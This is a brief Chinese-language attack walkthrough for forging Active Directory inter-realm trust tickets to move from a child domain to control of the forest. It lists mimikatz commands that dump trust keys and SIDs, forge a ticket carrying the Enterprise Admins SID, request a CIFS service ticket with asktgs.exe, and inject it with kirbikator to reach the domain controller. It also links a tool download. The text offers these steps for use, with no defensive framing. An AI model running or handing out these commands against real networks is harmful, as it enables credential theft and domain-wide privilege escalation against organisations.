环境:
攻击方法:伪造信任票据
部分工具下载地址:https://github.com/myxss/asktgs_compiled
一、获取子域和父域的SID 以及域信任密钥
mimikaze中有此功能
在mimikaze输入:lsadump::trust /patch
指向分别为 域林和子域的SID以及双方的信任密钥
二、通过SID以及信任密钥伪造信任密钥
在mimikatz中输入:
"kerberos::golden /domain:[当前所在域] /sid:[当前域的SID] /sids:[当前域的sid-519] /rc4:[信任密钥 /user:[将权限赋予谁] /service:[需要访问的服务] /target:[目标] /ticket:[生成的文件名] " exit
三、利用信任票据获得目标服务的TGS
输入命令:asktgs.exe [生成的信任票据kirbi] CIFS/[目标域主机名].[域名称]
四、将TGS票据注入到内存
将TGS票据注入到内存,使得主机有访问域林的权限
kirbikator.exe lsa CIFS.[目标域的主机名].[目标域名].kirbi
此时即可访问域控